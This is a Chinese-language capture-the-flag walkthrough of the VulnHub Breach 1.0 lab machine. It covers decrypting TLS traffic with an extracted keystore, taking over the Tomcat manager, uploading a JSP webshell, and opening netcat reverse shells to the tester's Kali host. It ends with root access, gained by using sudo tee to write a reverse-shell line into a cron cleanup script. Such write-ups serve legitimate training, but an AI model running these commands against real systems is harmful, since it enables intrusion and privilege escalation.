赞
踩
下载链接:
https://download.vulnhub.com/breach/Breach-1.0.zip
1.解压后用vmware打开,这里是我已经安装好的,未安装的只有ova和readme.txt两个文件
2.靶机默认使用仅主机模式,ip为192.168.110.140,所以需要将vmnet1的ip设置在192.168.110.0此网段。
3.使用本机ping靶机ip
可以看到成功ping通
4.配置kali,将kali配置为仅主机模式,然后修改kali中的ip为静态ip和靶机在同一网段。
使用管理员账户使用vim /etc/network/interfaces命令进入
将前面的#给去掉就是需要修改的东西,然后保存退出
重启网络使用systemctl restart working 或者 service working restart就可以发现可以成功ping通
接下来开始靶机练习
使用nmap扫描靶机开放的端口
通过扫描结果可以看到基本全部段都开放了,可能靶场做了某种防护措施,接下来先访问80端口。
1.通过浏览web界面并没有发现什么有用的信息,查看以下源代码
发现存在一串密钥,进行解密
2.经过多次解密得到pgibbons:damnitfeelta
3.再次查看源代码发现该图片有一个跳转链接
可以看到已经跳转到了另外一个界面
4.通过测试几个按钮除了最后一个其余都为图片链接,最后一个按钮又跳转到了另外一个界面
发现其为cms界面
5.尝试弱口令后无果,突然想起来前面解密出来的东西很像账号密码,进行登录,账号:pgibbons 密码:damnitfeelta
发现成功登录,然后其有一个地方很是显眼,貌似是邮件,点进去查看
6.通过查看邮件并翻译发现最后一封邮件说存在一个keystore的文件(keystore是存储公私密钥的一种文件格式)
通过浏览该地址确实存在文件,进行下载
7.通过浏览该界面在菜单里面发现了有一个提示
点击去发现存在一个下载pacp的链接
进行下载
8.直接打开发现都是经过加密的内容,接下来查看以下keystore这个密钥里面所有的证书
keytool -list -keystore keystore(这里需要输入口令在上面可以看到口令为tomcat)
导出证书
keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
9.将p12证书导入到wireshark
将流量包打开,在编辑中找到首选项-Protocols-SSL,在这里wireshark已经将SSL改为了TLS,将文件导入
我这里直接筛选出了http的包发现靶机通过http访问了https://192.168.110.140:8443/_M@nag3Me/html打开后是一个tomcat管理登录界面
10.继续观察数据包发现该tomcat是通过basic进行认证,在wireshark中自动解密tomcat:Tt\5D8F(#!*u=G)4m7zB
成功登录
在下面也有攻击者上传的马但是无法直接打卡所以进行重新上传
这里使用jsp木马,再将木马压缩为zip文件,修改后缀为war文件在进行上传
这里使用冰蝎马
这里查看以下用户特别注意以下这两个用户milton和blumbergh
注:这里需要一直上传木马才可以,可能该系统存在杀软或者webshell查杀工具,这里建议使用最新版本冰蝎,不然可能反弹shell失败
因为一直删除木马所以考虑反弹shell
这里我使用反弹shell命令为:nc -e /bin/sh 192.168.110.128 4444 这里的ip为你需要反弹到哪里的ip 我使用的是kali的ip 4444为监听的端口号
这里可以看到成功反弹并可以执行命令
注:后面我我又重新反弹了shell 因为nc反弹的不可以使用su命令
因为一直掉线所以我在这里查看了一下需要注意的两个文件
通过查看文件发现该数据库的用户为root密码为空
进行连接
可以查看到返回的账户和密码对密码进行破解,密码为:thelaststraw
这里发现无法执行su命令
这里使用python进行解决
python -c ‘import pty;pty.spawn("/bin/bash")’
查看milton用户home目录的文件,没有发现可以利用的信息
查看内核版本也不存在漏洞
查看一下系统命令
到现在发现了7张图片6张在图片目录下http://192.168.110.140/images/,1张在milyon用户下
将图片复制到kali里面使用strings打印各图片其中可打印的字符,追加输出到images.txt,在vim下查看,密码在bill.png图片中
查看images.txt找一下可能存在的密码或提示
发现唯一的单词是coffeestains怀疑是密码
用户:blumbergh 密码:coffeestains
查看历史命令
发现该用户查看了tidyup.sh脚本文件打开分析
这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。
查看tidyup.sh的权限,对该脚本没有写入权限,只有root可以
执行sudo -l 查看权限
发现用户能够以root权限执行这tee程序或tidyup.sh脚本:/usr/bin/tee和/usr/share/cleanup/tidyup.sh
tee命令用于读取标准输入的数据,并将其内容输出成文件。tidyup.sh是清理脚本。
向tidyup.sh中写入反弹shell命令
tidyup.sh文件只有root可写,而能够以root权限运行tee命令,那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令:
echo “nc -e /bin/bash 192.168.110.128 5555” > shell.txt
再使用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看tidyup.sh文件写入成功:
cat /usr/share/cleanup/tidyup.sh
等待反弹shell
因为我这里上传的不是大马,所以我想了半天把该图片直接复制到了images目录下面可以直接打开查看flag
这个靶场我也是遇到了很多的坑,从wireshark抓包分析到上传木马再到反弹shell出现了很多的问题,但是出现了问题那么肯定要解决问题,经过不懈的努力终于还是拿下了,一定要有耐心,也要有信心。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。